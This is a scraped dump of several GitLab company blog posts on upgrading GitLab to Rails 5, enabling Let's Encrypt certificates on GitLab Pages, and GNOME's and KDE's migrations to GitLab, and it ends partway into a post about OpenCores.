\"Article\",\n        \"headline\": \"The road to Rails 5\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jan Provaznik\"}],\n        \"datePublished\": \"2019-05-28\",\n      }",{"title":5125,"description":5126,"authors":5131,"heroImage":5127,"date":5133,"body":5134,"category":801,"tags":5135},[5132],"Jan Provaznik","2019-05-28","\nWith [Rails 6 coming soon](https://weblog.rubyonrails.org/2018/12/20/timeline-for-the-release-of-Rails-6-0/) it's a good time to look back at the journey we took when upgrading GitLab to Rails 5, which was not so long ago.\n\n[Our issue for upgrading to Rails 5](https://gitlab.com/gitlab-org/gitlab-ce/issues/14286) was around for quite a while, largely because it was difficult to switch such a big project as GitLab instantly to the next major version. Here is a brief story about how we solved this upgrade challenge.\n\n## Our solution? Cut it into pieces\n\nThe upgrade to Rails 5 was first prepared as a one big merge request. The nice thing about this approach is that when the merge request is ready, you can just merge the single merge request without dealing with any backward compatibility. The [first attempt](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/5555) had lower priority and it was later replaced with a [second attempt](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/12841). But for the GitLab codebase this merge request became pretty big: 151 commits, over 120 pushes, and more than 1000 changed files. Then it was almost impossible to get such merge request ready to be merged and keep it up to date without hitting problems with conflicts.\n\nRather than trying to get the upgrade done in a single merge request, a couple of changes made it possible to run the application either on Rails 4 or 5 depending on an environment variable. The application was still running on Rails 4 by default, but we were able to run it on Rails 5 either locally or in CI just by setting `RAILS5` and `BUNDLE_GEMFILE` environment variables. This allowed us to split the upgrade into many small issues. Typically each issue addressed one specific type of error in CI, so with each fix there were fewer failing tests in CI. Another major benefit was that then it was significantly easier to split the work between more people and to get an overview of who was working on what issue.\n\nA Rails version-specific Gemfile was loaded depending on the `RAILS5` and `BUNDLE_GEMFILE` environment variable. Here is an example of [enabling Rails 5 in rspec](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/18140):\n\n```ruby\ngemfile = %w[1 true].include?(ENV[\"RAILS5\"]) ? \"Gemfile.rails5\" : \"Gemfile\"\nENV['BUNDLE_GEMFILE'] ||= File.expand_path(\"../#{gemfile}\", __dir__)\n```\n\nThe content of [Gemfile.rails5](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/17761):\n\n```ruby\n# BUNDLE_GEMFILE=Gemfile.rails5 bundle install\n\nENV[\"RAILS5\"] = \"true\"\n\ngemfile = File.expand_path(\"../Gemfile\", __FILE__)\n\neval(File.read(gemfile), nil, gemfile)\n```\n\nAnd the Gemfile:\n\n```ruby\ndef rails5?\n  %w[1 true].include?(ENV[\"RAILS5\"])\nend\n￼\ngem_versions = {}\ngem_versions['activerecord_sane_schema_dumper'] = rails5? ? '1.0'      : '0.2'\ngem_versions['default_value_for']               = rails5? ? '~> 3.0.5' : '~> 3.0.0'\ngem_versions['html-pipeline']                   = rails5? ? '~> 2.6.0' : '~> 1.11.0'\ngem_versions['rails']                           = rails5? ? '5.0.6'    : '4.2.10'\ngem_versions['rails-i18n']                      = rails5? ? '~> 5.1'   : '~> 4.0.9'\n```\n\nThere were situations when a fix for Rails 5 was not compatible with Rails 4 and two different versions of code were needed, typically an Active Record query. For this purpose we used a simple helper method `Gitlab.rails5?` to check which version was being used and added code for each version. It was pretty easy to remove all Rails 4-compatible code in the cleanup phase when we upgraded to Rails 5 just by searching for `Gitlab.rails5?` in our codebase.\n\nAn example of the check used in `lib/gitlab/database.rb`:\n\n```ruby\ndef self.cached_table_exists?(table_name)\n  if Gitlab.rails5?\n    connection.schema_cache.data_source_exists?(table_name)\n  else\n    connection.schema_cache.table_exists?(table_name)\n  end\nend\n```\n\n## Upgrade process\n\nTo be able to address upgrade issues in small, separate pieces, we did the following steps during the upgrade process:\n\n* [Allowed GitLab to run both with Rails 4 and 5](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/17761), but keep Rails 4 default.\n* We also [added support both for Rails 4 and 5 into GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/merge_requests/497).\n* Fixed all issues until it fully worked with Rails 5 and CI was green.\n* Did manual testing to make sure everything will work after the upgrade.\n* [Switched to Rails 5 by default](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/21492), (but kept Rails 4 code).\n* Still enforced compatibility with Rails 4 (by running CI both with Rails 4 and 5) in case we had to switch back because of a blocker issue.\n* Dropped Rails 4 compatibility when we were sure everything worked. Releases are done monthly, so we removed Rails 4 code after the next release.\n\n## Major challenges\n\n### Active Record changes\n\nIn some places we use `Arel` directly and there were various incompatible changes (e.g. [`IN` statement issue](https://github.com/rails/arel/issues/531) solved by [this fix](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/19796)) which caused some of our SQL queries to stop working on Rails 5. (Almost) all of them were discovered during the preparation phase thanks to good test coverage. A list of [database-related changes is here](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?label_name%5B%5D=rails5&label_name%5B%5D=database&scope=all&state=all).\n\n### Monkey patches\n\nWe keep various monkey patches (either not-merged-yet upstream fixes or custom extensions), many of which required refactoring with the major upgrade. The positive is that we were able to get rid of some of them.\n\n### Keeping Rails 5 CI green\n\nThere was quite a long period between the moment we had all Rails 5 issues fixed and the moment we really switched the master branch to Rails 5.\nDuring this period we used a scheduled pipeline which ran daily on CE and EE master branches on Rails 5, so we knew quickly when a new incompatibility issue was introduced.\nAnother option was running CI jobs both for Rails 4 and 5 for each merge request and making it mandatory to pass all jobs. The disadvantage of this option was it would take twice as much time to run CI.\n\nUnfortunately there were many new incompatibility issues introduced during this period. Next time it would be better to run CI for each merge request, both with Rails 4 and 5, although it would require twice as much CI runtime.\n\n## Production release\n\nOnce we had all known issues in our codebase fixed, we still had additional steps to make sure we didn't hit a critical issue when releasing the next version. [We tracked these steps in this issue](https://gitlab.com/gitlab-org/gitlab-ce/issues/48991). We switched master branches to Rails 5 at the beginning of the development cycle (each cycle is one month long). We then ran CI jobs both with Rails 5 (default) and 4 (to keep backward compatibility). Timing was important because during the development cycle we discovered a couple of issues and we had enough time to fix them before release. After the release of the next version (11.6), when we were sure that we would not have to switch back to Rails 4, we removed Rails 4 both from CI and from the codebase.\n\nAlthough it took longer than expected, I think this upgrade was successful because it didn't cause any production issues. There were a few [major issues](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=closed&label_name[]=rails5&label_name[]=P1) discovered after switching the master branch, but we were able to fix them quickly before release.\n\nThis upgrade was done with huge help from our community – especially [@blackst0ne](https://gitlab.com/blackst0ne) and [@jlemaes](https://gitlab.com/jlemaes). Thank you!\n\n## Next steps\n\n* The upgrade to Rails 5.1 is [happening now](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24852).\n* The upgrade to Rails 5.2 is [still in progress](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/8877) – unfortunately there are many incompatibilities.\n\nBecause upgrades to 5.1 and 5.2 should be relatively small, we aim to do each upgrade in a single merge request. The upgrade to Rails 6 is expected to be bigger, so hopefully the same approach we used for Rails 5 upgrade will be useful in this case too.\n\nPhoto by Cody Board on [Unsplash](https://unsplash.com/photos/2hu-SSktidc)\n{: .note}\n",[779,1802,9,267],{"slug":5137,"featured":6,"template":689},"upgrade-to-rails5","content:en-us:blog:upgrade-to-rails5.yml","Upgrade To Rails5","en-us/blog/upgrade-to-rails5.yml","en-us/blog/upgrade-to-rails5",{"_path":5143,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5144,"content":5149,"config":5154,"_id":5156,"_type":14,"title":5157,"_source":16,"_file":5158,"_stem":5159,"_extension":19},"/en-us/blog/using-gitlab-pages-lets-encrypt",{"title":5145,"description":5146,"ogTitle":5145,"ogDescription":5146,"noIndex":6,"ogImage":857,"ogUrl":5147,"ogSiteName":673,"ogType":674,"canonicalUrls":5147,"schema":5148},"GitLab and Let's Encrypt partner to improve website security","Learn how to add a Let's Encrypt TLS certificate to a website hosted and managed via GitLab Pages.","https://about.gitlab.com/blog/using-gitlab-pages-lets-encrypt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and Let's Encrypt partner to improve website security\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"},{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2022-09-29\",\n      }",{"title":5145,"description":5146,"authors":5150,"heroImage":857,"date":5151,"body":5152,"category":865,"tags":5153},[1372,2909],"2022-09-29","\n\n[Let's Encrypt](https://letsencrypt.org/), a free, automated, and open certificate authority, is integrated with GitLab to help DevOps teams encrypt web traffic and protect the confidentiality of information their users share with websites.\n\nThis article explains, step by step, how to add a Let's Encrypt Transport Layer Security ([TLS](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/ssl_tls_concepts.html)) certificate to a website hosted and managed via GitLab Pages.\n\n## What is TLS?\n\nTLS is a protocol designed to make the internet more secure. Now more than two decades old, TLS, which evolved from Secure Sockets Layer (SSL), helps ensure that when users connect to websites — and transmit potentially sensitive data to and from those websites — they are doing so over a secure connection.\n\nIt's an important protocol because internet connections aren't necessarily secure by default. Malicious actors can intervene in the internet connection made to retreive web pages, and then they can view or even manipulate the data traveling through that connection. To minimize the chance of that happening, DevOps teams need to enable a way to guarantee - to certify - that the connection is genuine and secure.\n\nThat's where TLS comes in.\n\n## How does TLS work?\n\nTLS consists of several components, one of which is [a digital certificate](https://www.digicert.com/what-is-an-ssl-certificate), the goal of which is to secure data flowing to and from a website and help users trust in the integrity and confidentiality of that data.\n\nThe website or domain controller can install that certificate on a web server so that a user visiting the site can view it and feel assured their connection to the website is secure. The controller will ask a certifying body — called a certificate authority, or CA — to electronically sign and verify the certificate to indicate that the person or organization has control over the domain. Users can then view the certificate's details to scrutinize the connection.\n\nTo do this, simply load any TLS-protected website in a browser (\"https://\" will appear in the URL where the \"s\" indicates a secure connection), and, typically, a \"lock\" icon in the browser's URL bar. Clicking on that lock reveals certificate details.\n\nAs long as users trust the body that issued the certificate, they can feel more confident their connection to the website is secure. \n\n![GitLab's website, indicating the secure connection by clicking on the lock icon in the URL bar](https://about.gitlab.com/images/blogimages/secureeasy-blog-post-image-1.png)\n\n\nGitLab's website is delivered over a secure connection.\n{: .note.text-center}\n\n\n![GitLab's website indicating the security certificate is valid in the lock icon on the URL browser bar](https://about.gitlab.com/images/blogimages/secureeasy-blog-post-image-2.png)\n\n\nGitLab's website security certificate is valid.\n{: .note.text-center}\n\n\n## Let's Encrypt and TLS certificates\n\nHistorically, obtaining TLS certificates was a complicated and costly endeavor.\n\n[Let's Encrypt formed in 2013](https://www.crn.com/news/cloud/300074840/lets-encrypt-a-free-and-automated-certificate-authority-comes-out-of-stealth-mode.htm) to ensure everyone had access to the benefits of encryption. Part of the nonprofit [Internet Security Research Group](https://www.abetterinternet.org/), Let's Encrypt aims to simplify the process of issuing, installing, configuring, and managing TLS certificates. By doing so, it hopes to create an internet that is [more privacy-respecting and secure](https://letsencrypt.org/about/). \n\nLet's Encrypt is an open and secure certificate authority that makes the process of obtaining and applying TLS certificates easy, automated, and free for website administrators. GitLab's integration with Let's Encrypt enables anyone hosting a webpage using GitLab Pages to obtain and apply a TLS certificate with a single click.\n\n## Securing a website with GitLab Pages and Let's Encrypt\n\n[GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/index.html) allows anyone with a GitLab project to host and maintain a static website and, with [the help of Let's Encrypt](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.html), do so securely.\n\nTo start, create a GitLab pages website:\n\n- Create [a new project](https://docs.gitlab.com/ee/user/project/pages/index.html#how-it-works) (or [fork a sample project](https://docs.gitlab.com/ee/user/project/pages/getting_started/pages_new_project_template.html)) in your GitLab namespace.\n- Add your website's source code to that project.\n- Register a personal domain name, add it to the project, and [verify it](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/index.html#set-up-pages-with-a-custom-domain).\n\nYou're now ready to [add a TLS certificate](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/index.html#adding-an-ssltls-certificate-to-pages) to your site [with Let's Encrypt](https://docs.gitlab.com/ee/user/project/pages/custom_domains_ssl_tls_certification/lets_encrypt_integration.html).\n\n* Navigate to your project's Settings, then choose Pages.\n* Find the domain you want to secure and select Details.\n* Click Edit in the top-right corner to modify those details.\n* Click the switch to activate Automatic certificate management using Let's Encrypt.\n* Click Save to save your changes.\n\nAnd that's it. Really.\n\nThe only thing left to do is wait. Obtaining a Let's Encrypt certificate for a website can take up to an hour. But once you've acquired one, you'll see the certificate information underneath the domain name listed in your Pages settings.\n\nAdditionally, you can enhance your website's security by forcing incoming traffic to connect to it securely. Just tick the box to enable \"Force HTTPS\".\n\n## Contributing to a more secure internet\n\nThe internet is an incredibly valuable tool, but with that value comes complexity. Let’s Encrypt provides digital certificates to more than 290 million websites, working to create an internet that is more secure and respectful of the privacy of its users. \n\nAt GitLab, we believe that [everyone can contribute](/company/mission/#everyone-can-contribute) — and that includes contributing to a safer, more secure internet. By obtaining and setting up an TLS certificate, DevOps teams benefit from and contribute to the adoption of internet encryption. Internet security shouldn’t be difficult, and GitLab hopes that our integration with Let’s Encrypt supports a more secure internet for everyone.\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/_wasba1jCoI\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n",[9,865,267],{"slug":5155,"featured":6,"template":689},"using-gitlab-pages-lets-encrypt","content:en-us:blog:using-gitlab-pages-lets-encrypt.yml","Using Gitlab Pages Lets Encrypt","en-us/blog/using-gitlab-pages-lets-encrypt.yml","en-us/blog/using-gitlab-pages-lets-encrypt",{"_path":5161,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5162,"content":5167,"config":5172,"_id":5174,"_type":14,"title":5175,"_source":16,"_file":5176,"_stem":5177,"_extension":19},"/en-us/blog/welcome-gnome-to-gitlab",{"title":5163,"description":5164,"ogTitle":5163,"ogDescription":5164,"noIndex":6,"ogImage":2768,"ogUrl":5165,"ogSiteName":673,"ogType":674,"canonicalUrls":5165,"schema":5166},"GNOME, welcome to GitLab!","We’re excited to welcome free software project GNOME to the GitLab community.","https://about.gitlab.com/blog/welcome-gnome-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GNOME, welcome to GitLab!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-05-31\",\n      }",{"title":5163,"description":5164,"authors":5168,"heroImage":2768,"date":5169,"body":5170,"category":10,"tags":5171},[1859],"2018-05-31","\n\nGNOME, one of the most recognized, respected projects in the open source world, [has moved to GitLab](https://www.gnome.org/news/2018/05/gnome-moves-to-gitlab-2/) to manage their more than 400 software projects and nearly 900 annual contributors. We couldn’t be happier to welcome the GNOME community! The migration is great news for both our communities, and we hope it’s just the beginning of a long and productive partnership.\n\n[_Want to hear how it's going for GNOME now? We caught up with the project in September 2020_](/blog/gnome-follow-up/).\n{: .alert .alert-info .text-center}\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/v6GTrbfe9xk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\u003C/figure>\n\n## A catalyst for change\n\nLast year we were approached by developers of [Debian](/blog/automated-debian-package-build-with-gitlab-ci/) to consider dropping our Contributor License Agreement (CLA) in favor of the Developer’s Certificate of Origin (DCO). In November [we announced that we’d be switching to a DCO](/blog/gitlab-switches-to-dco-license/), and we’re happy that this change has been welcomed by the GNOME community too:\n\n>\"We applaud GitLab for dropping their CLA in favor of a more OSS-friendly approach. Open source communities are born from a sea of contributions that come together and transform into projects. This gesture affirmed GitLab's willingness to protect the individual, their creative process, and most importantly, keeps intellectual property in the hands of the creator.\" - Carlos Soriano, Board Director at GNOME\n\n## About GNOME\n\nGNOME software is used by millions of people worldwide, and is one of the largest and oldest free software projects. It’s best known for its desktop, which is a key part of the most popular GNU/Linux distributions, including Ubuntu, Debian, SUSE, and Fedora. However, the project also has a long history of producing critical pieces of software infrastructure: common parts of countless open source systems that are often taken for granted. Many essential, ubiquitous technologies began their life in the GNOME project, and have gone on to become the essential ingredients for a diverse range of products, communities, and companies. These include Mono, FOSS C# implementation used by Xamarin, a core team of Microsoft; and Inotify, Linux kernel file monitoring.\n\n“Throughout its history, the GNOME project has been the training ground for software engineers and contributors who have gone on to play important roles elsewhere,” says Nuritzi Sanchez, president of GNOME’s board of directors and core member of the engagement team. “With a focus on quality engineering, design-driven development, and system-level plumbing, GNOME serves as an excellent environment for new contributors, and GNOME alumni hold positions at Google, Apple, Microsoft, Red Hat, innovative startups, and beyond.”\n\nGNOME's software is found in televisions, e-book readers, in-vehicle infotainment systems, medical devices, and much more. The project continues to produce new, innovative technologies which are transforming the Linux ecosystem. Recent innovations include Flatpak and the accompanying app store, Flathub, which enables applications to run on any Linux-based operating system.\n\n## So, why GitLab?\n\nBefore migrating, GNOME used a broad range of tools to fulfil a number of specific purposes – from [CGit for hosting to Bugzilla for bug tracking](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure/ExistingState) – but the number of tools made the onboarding experience for new contributors cumbersome and confusing. They started looking for a single tool to meet more of their needs to make this process easier and to improve their own workflows.\n\n“We did an [extensive analysis](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure) of multiple tools as we considered a solution that would fit all the requirements of an organization as big as GNOME,” says Nuritzi. “We had a set of hard requirements, with the most important one being that it must be free software, ideally not only in license but also in spirit.”\n\nYou can check out [their analysis](https://wiki.gnome.org/Initiatives/DevelopmentInfrastructure) for a full account of the decision-making process.\n\n## What does the move mean for GNOME?\n\nGNOME was looking for a way to make it easier for newcomers to contribute, and they got it.\n\n“With a modern and familiar interface with well-designed tools, using GitLab makes the GNOME community more approachable – especially to a new generation of newcomers that is used to products that are modern-looking and easy to use,” says Nuritzi. They’ve also noticed that by using a single tool and having everyone under the same roof (as it were!), there’s more opportunity for teams to work together and cross-pollinate, resulting in a more engaged and collaborative community.\n\n### Better together\n\nApart from an easier workflow for newcomers and improved collaboration and cohesion between teams, GNOME has picked up on an unexpected benefit: the return of old projects and an influx of new ones. The ease of creating personal projects in GitLab has fostered better proximity between GNOME’s community of developers and [projects](https://gitlab.gnome.org/explore/groups), even if they aren’t part of the official GNOME project. “This allows those projects to be closer to our community of developers and products, and helps us increase our reach,” says Nuritzi. “We’re also very pleased to see that some major Linux distributions have begun to move part of their operations to groups in GNOME’s GitLab. This has allowed more collaboration between GNOME and these distributions, and is a great step forward in helping to create a tighter-knit broader community.”\n\nThis improved closeness and reach is what we’re really excited about – when it comes to open source communities using GitLab, the more the merrier we say! It’s our hope that the boost in collaboration and networking GNOME has experienced will extend to our own community, as well as those of other open source projects moving to GitLab.\n\n## How to contribute\n\nIn keeping with our own vision of “everyone can contribute,” GNOME has opportunities for contributors from all backgrounds. “If you like marketing and community management, we have the engagement team, if you’re into doing translations and documentation, we have the teams for that. If you like designing software, we have the design team. And if you want to contribute code, there are many projects with maintainers who welcome newcomers and can help answer the questions they may have,” says Nuritzi. “Each team has its own resources and workflows, but we all belong to the larger GNOME community with a common culture based on free software and open collaboration.” Visit [gnome.com/get-involved](https://www.gnome.org/get-involved/) to get started.\n",[9,930,267],{"slug":5173,"featured":6,"template":689},"welcome-gnome-to-gitlab","content:en-us:blog:welcome-gnome-to-gitlab.yml","Welcome Gnome To Gitlab","en-us/blog/welcome-gnome-to-gitlab.yml","en-us/blog/welcome-gnome-to-gitlab",{"_path":5179,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5180,"content":5186,"config":5191,"_id":5193,"_type":14,"title":5194,"_source":16,"_file":5195,"_stem":5196,"_extension":19},"/en-us/blog/welcome-kde",{"title":5181,"description":5182,"ogTitle":5181,"ogDescription":5182,"noIndex":6,"ogImage":5183,"ogUrl":5184,"ogSiteName":673,"ogType":674,"canonicalUrls":5184,"schema":5185},"Why the KDE community is #movingtogitlab","Open source software community giant KDE finished phase one of their migration to GitLab and has joined our GitLab open source program. Check out what's next for KDE and GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681382/Blog/Hero%20Images/migratingbirds.jpg","https://about.gitlab.com/blog/welcome-kde","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why the KDE community is #movingtogitlab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2020-06-29\",\n      }",{"title":5181,"description":5182,"authors":5187,"heroImage":5183,"date":5188,"body":5189,"category":10,"tags":5190},[2773],"2020-06-29","\n\nThe [KDE community](https://kde.org/) is [#movingtogitlab](https://twitter.com/hashtag/movingtogitlab)! After announcing the original decision to migrate to GitLab in November 2019, KDE has officially completed phase one of their migration, and contributors have begun to use GitLab on a daily basis at invent.kde.org. Read on to learn more about KDE's migration story.\n\n## About KDE\n\nKDE is an international community that creates open source software for desktops and mobile devices. KDE software is compatible with multiple platforms, including GNU/Linux, FreeBSD, Windows, macOS, and Android. Their products are used by millions of home and office workers and are being deployed in schools around the world.\n\nWith more than 2,700 artists, designers, programmers, translators, writers, and other contributors from across the globe, the KDE community is thriving.\n\nTogether, this community creates and maintains more than 200 applications and countless add-ons, plugins, and Plasmoids, 1000+ repositories, 80+ frameworks for Qt developers, and more than 2,600 projects. KDE software is translated into more than 100 languages to enable vast global reach.\n\n## Why KDE moved to GitLab\n\nOne of the main reasons that KDE decided to move to GitLab is to improve the newcomers story and make it easier to start contributing to KDE software. As [Aleix Pol](https://ev.kde.org/corporate/board/), President of KDE e.V says, \"Adopting GitLab has been a natural next step for us. Simplifying the onboarding experience for new contributors is one of our main goals in the KDE community. Being able to allow project contributors to easily participate in how the products they maintain are tested and delivered will certainly be a turning point for our ecosystem.\"\n\n\"By using a platform offering an interface and workflow that most open source developers are nowadays familiar with, we are confident that we are lowering the bar for new contributors to join us, and are providing the foundation for our community to scale in the following years,\" added [Neofytos Kolokotronis](https://ev.kde.org/corporate/board/), member of KDE e.V.'s Board of Directors and a core member of KDE's Onboarding team.\n\nAnother important consideration for the KDE community was to move to a product that was well-supported and where feedback from the community would be taken into account. With a release every month, GitLab has fast-paced development and is actively maintained by the company and community alike. Community members help to shape the way the product is built, and there's an [open roadmap](/direction/) since [transparency is one of GitLab's core values](https://handbook.gitlab.com/handbook/values/#transparency).\n\nMoving to new tools is a lot of work for established communities like KDE. Migration decisions require careful communication and the complex task of gathering community consensus.\n\nThe KDE team made the decision to migrate away from its [former tech stack](https://gitlab.com/gitlab-org/gitlab/-/issues/24900#gitlab-replacements) after following a series of carefully designed steps. First, they talked to the sysadmin team and then formed a migration team to evaluate the move. Next, the sysadmin team completed a thorough study of GitLab's features and did an intake and comparison of the community's needs against those product features. Then, they created a process that allows KDE to run short test cycles with some projects, document the process, and provide feedback to the community.\n\nThe migration started by moving some smaller and more agile KDE teams that were very interested in testing and providing feedback. After this cycle was completed successfully, KDE started migrating teams with a larger codebase and more contributors. Once all of the major issues were resolved, they made the final switch for all remaining projects they planned to move. The sysadmin team documented the results after each step and shared them directly with the KDE community to receive feedback and gather consensus on how to proceed.\n\nAs the switch to GitLab fell directly under the scope of KDE's [\"Streamlined Onboarding of New Contributors\" goal](https://community.kde.org/Goals/Streamlined_onboarding_of_new_contributors), the KDE Onboarding team was also involved from the start, working very closely with the sysadmin team, who were leading the effort. The community was involved in the decision-making from the beginning, and stayed up-to-date on each phase of the migration, and all questions and concerns were answered and addressed along the way.\n\n\"This was a major change for us, but we are very satisfied with how our community collaborated over long discussion threads. We believe that by working together we made the best decisions as we moved forward,\" says Neofytos.\n\n## Migration challenges and solutions\n\nThe biggest challenge for KDE was the sheer volume of data they were dealing with and how it was integrated into the numerous tools in use (including [Phabricator](https://www.phacility.com/phabricator/)). With more than 1,000 repositories, this migration was a big undertaking.\n\nTo address this challenge, KDE decided to approach the migration in phases rather than do it all at once. By phasing the migration, they were able to deal with different data types, such as repositories and tasks, separately.\n\nKDE developed custom tools to make bulk updates easier throughout the migration process. These tools help set the name, description, and avatar of the projects alongside a number of settings, for example, protected branches, and merge methods. By using these custom tools for bulk updates, KDE was also able to avoid granting maintainer access to individual contributors. KDE only allows maintainer access for sysadmins per their access and permissions policy.\n\nKDE ported custom Git hooks to ensure that certain checks and actions continued after the move to Gitlab. These include checks to ensure file encodings match KDE requirements and that bugs on their Bugzilla installation were closed as needed.\n\nIn order to support their translation community, which still uses Subversion in their workflow, KDE also built tooling to export SSH keys from GitLab to avoid the need to update these in two places.\n\nKDE also adjusted the tools used to build and develop KDE software to make them compatible with the new repository structure in GitLab.\n\nAt this point, KDE overcame most of their migration hurdles. Once the preparation work was finished to clean up a number of systems to work more natively with GitLab, the actual migration took about one day.\n\nBut there are a few more challenges left before KDE can transition continuous integration (CI) and task management over to GitLab. To follow along with the KDE migration, you can take a look at the [list of issues that KDE is tracking](https://gitlab.com/gitlab-org/gitlab/-/issues/26581).\n\n## Architectural decisions\n\nA common challenge for organizations moving to GitLab is deciding how to structure their groups to best enable their community's workflows and allow them to abide by their policies.\n\nKDE decided to tackle this challenge by setting up a series of groups at the top level of GitLab to act as categories. KDE's 1,200 repositories were then sorted into each of these categories.\n\nKDE formed this architectural strategy to help make projects more discoverable. KDE wanted to avoid the impracticality of people needing to scroll endlessly through repositories. Setting up top-level categories also allows developers to get an easier overview of merge requests for the categories they are most interested in.\n\nWith regards to permissions, KDE uses a single master \"KDE Developers\" group to manage membership and permission levels. Everyone there is given \"Developer\" access. This group is then invited to all of the groups containing repositories except for the ones containing the KDE website and infrastructure repos. This method of dealing with permissions allows KDE to maintain a single source of truth.\n\n## GitLab + KDE = ❤️\n\nKDE is using the [Community Edition](/install/ce-or-ee/) of GitLab because of their commitment to open source. They are a member of our [GitLab for Open Source](/solutions/open-source/) program, and have been actively collaborating with GitLab team members throughout the migration. One of benefits of using the GitLab for Open Source program for large migration efforts is that the community often offers some extra assistance through the evaluation period and beyond.\n\nFor example, the GitLab for Open Source program has a [public tracker for KDE's migration](https://gitlab.com/gitlab-org/gitlab/-/issues/24900), which is used to communicate and better understand at a glance the issues that are especially important. This allows KDE, GitLab, and the larger open source community to collaborate on challenges together.\n\n\"GitLab's values of [collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) and [transparency](https://handbook.gitlab.com/handbook/values/#transparency) really shine through,\" says Neofytos. We appreciate their openness to accepting merge requests from community members and considering proposals for new features. We have had a great experience so far collaborating with members of the GitLab community and members of the GitLab team – from developers to program managers to product owners alike.\"\n\nNow that phase one of the KDE migration is complete, we look forward to continuing to collaborate with KDE through the remaining phases of the migration.\n\n### Summary of the KDE migration\n\n * Phase 1: Code hosting & review ✅\n * Phase 2: CI\n * Phase 3: Task management for developers\n\n## How to contribute to KDE\n\nKDE has an amazing community and they welcome new members! Existing members are happy to provide feedback on newcomers' contributions with the goal of helping them learn. Every day more and more people join the ever-growing KDE family – and there's always room for more!\n\nKDE has a rich infrastructure of web resources, forums, mailing-lists, IRC (chat), and many other ways to get in touch. To learn more about joining the KDE community, visit their \"[Get Involved](https://community.kde.org/Get_Involved)\" page, which offers guidance to all contributors from all backgrounds.\n\n",[9,910,685],{"slug":5192,"featured":6,"template":689},"welcome-kde","content:en-us:blog:welcome-kde.yml","Welcome Kde","en-us/blog/welcome-kde.yml","en-us/blog/welcome-kde",{"_path":5198,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5199,"content":5205,"config":5212,"_id":5214,"_type":14,"title":5215,"_source":16,"_file":5216,"_stem":5217,"_extension":19},"/en-us/blog/welcoming-opencores-to-gitlab",{"title":5200,"description":5201,"ogTitle":5200,"ogDescription":5201,"noIndex":6,"ogImage":5202,"ogUrl":5203,"ogSiteName":673,"ogType":674,"canonicalUrls":5203,"schema":5204},"OpenCores come to GitLab","OpenCores moves to GitLab to accelerate digital design flow.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669768/Blog/Hero%20Images/gitlab-opencores-oliscience.jpg","https://about.gitlab.com/blog/welcoming-opencores-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"OpenCores come to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andrea Borga\"},{\"@type\":\"Person\",\"name\":\"David Planella\"}],\n        \"datePublished\": \"2019-12-03\",\n      }",{"title":5200,"description":5201,"authors":5206,"heroImage":5202,"date":5209,"body":5210,"category":299,"tags":5211},[5207,5208],"Andrea Borga","David Planella","2019-12-03","\n\n[OpenCores](https://opencores.org), the largest and most popular Gateware\ndevelopment community with over [300K members and 1200+\nprojects](https://opencores.org/about/statistics), is moving to GitLab. This\nis excellent news all around: as a catalyst for accelerating IP core development\nand for introducing GitLab to innovative uses in the scientific and electronic\ndesign communities.\n\n## Gateware and OpenCores\n\n![Gateware design flow diagram](https://about.gitlab.com/images/blogimages/welcoming-opencores-to-gitlab/gateware_flow.png \"Gateware flow\")\n\nOpenCores is a repository of reusable units of logic, open to use as building\nblocks for the electronics design community. These units are most commonly known as\n[Intellectual Property (IP)\ncores](https://en.wikipedia.org/wiki/Semiconductor_intellectual_property_core),\nand are described (coded), in [Hardware Description\nLanguage](https://en.wikipedia.org/wiki/Hardware_description_language) (HDL)\nfor the most part.\n\n### What is gateware?\n\nIn the semiconductor industry, these are the basic constituents of advanced\ndigital designs, collectively known as\n**gateware**: A layer in the electronics development chain positioned in\nbetween 